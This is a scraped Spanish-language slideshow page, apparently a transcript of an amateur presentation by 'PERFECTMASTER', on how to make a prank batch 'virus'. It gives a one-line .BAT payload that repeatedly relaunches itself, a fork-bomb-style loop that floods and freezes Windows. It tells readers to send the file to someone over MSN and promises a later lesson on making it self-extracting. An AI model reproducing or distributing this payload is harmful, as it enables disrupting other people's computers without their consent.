La descarga está en progreso. Por favor, espere

La descarga está en progreso. Por favor, espere

Para crear un archivo.BAT lo primero que debemos hacer es darle clic Dereho en el escritorio, luego vamos a darle nuevo documento de texto Que es lo mismo.

Presentaciones similares


Presentación del tema: "Para crear un archivo.BAT lo primero que debemos hacer es darle clic Dereho en el escritorio, luego vamos a darle nuevo documento de texto Que es lo mismo."— Transcripción de la presentación:

1 Para crear un archivo.BAT lo primero que debemos hacer es darle clic Dereho en el escritorio, luego vamos a darle nuevo documento de texto Que es lo mismo que BLOC DE NOTAS, después teclearemos lo Siguiente en el documento Y LO GUARDAN CON EL MISMO NOMBRE Y EL TOQUE FINAL.BAT : @echo off START VIRUS.BAT VIRUS.BAT >>>>>>ESO es todo el nombre que escriban ahí ya sea virus o etc…. No Altera el proceso lo importante es el.BAT Y LISTO MANDESELO A ALGUIEN A SU MSN ……. : - ) >>>>>>POSDATA: NO LO ABRAN EN SU COMPUTADORA SI LO MATA LA CURIOSIDAD SE DARAN CUENTA DE LO QUE PASA PERO NO ES NADA GRAVE SOLO REINICIEN LA PC Y LISTO. ESPERO QUE LE GUSTE …. **PERFECTMASTER**

2 Como se que a lo mejor podía que no les funcionara en tal caso aquí Les dejo un ejemplo a seguir para que les quede chévere.

3

4

5

6 ESO ES TODO MUCHACHOS EL RESTO YA SE LO SABEN AHH.. CASI SE ME OLVIDA MÁS ADELANTE LES VOY A ENSEÑAR COMO HACER ESE ARCHIVO CREADO BAT AUTOEXTRAIBLE HAY MUCHOS QUE LO SABEN HACER PERO YO IGUAL LO PONGO PARA LO QUE NOS SEPAN. ESPERO QUE LE HAYA GUSTADO DE VERDAD ES CORTO, SENCILLO Y FASTIDIOSO HAY MUCHO MÁS PERO COMO SE DICE NO POCO A POCO. F….K


Descargar ppt "Para crear un archivo.BAT lo primero que debemos hacer es darle clic Dereho en el escritorio, luego vamos a darle nuevo documento de texto Que es lo mismo."

Presentaciones similares


Anuncios Google